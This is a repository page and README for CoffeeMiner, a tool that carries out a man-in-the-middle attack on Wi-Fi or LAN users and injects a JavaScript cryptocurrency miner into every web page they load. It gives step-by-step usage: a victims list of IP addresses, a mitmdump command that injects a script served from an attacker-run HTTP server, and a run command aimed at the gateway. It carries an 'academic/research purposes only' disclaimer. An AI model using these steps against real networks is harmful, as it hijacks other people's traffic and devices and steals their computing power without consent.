arnaucode e586ddbeb2 working
2017-12-25 02:22:01 +01:00
2017-12-25 02:22:01 +01:00
2017-12-25 02:22:01 +01:00
2017-12-18 00:23:00 +01:00
2017-12-25 02:22:01 +01:00
2017-12-25 02:22:01 +01:00
2017-12-18 00:22:05 +01:00
2017-12-25 02:22:01 +01:00
2017-12-25 02:22:01 +01:00
2017-12-18 00:23:00 +01:00
2017-12-25 02:22:01 +01:00

CoffeeMiner

Collaborative (mitm) cryptocurrency mining pool in wifi networks

Warning: this project is for academic/research purposes only.

Concept

  • Performs a MITM attack to all selected victims
  • Injects a js script in all the HTML pages requested by the victims
  • The js script injected contains a cryptocurrency miner
  • All the devices victims connected to the Lan network, will be mining for the CoffeeMiner

Use

  • install.sh
bash install.sh
  • edit victims.txt with one IP per line
  • edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
  • run.py
python3 coffeeMiner.py ipgateway

network

A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md

Description
No description provided
Readme GPL-3.0 2.7 MiB
Languages
Python 88.9%
Shell 8%
JavaScript 3.1%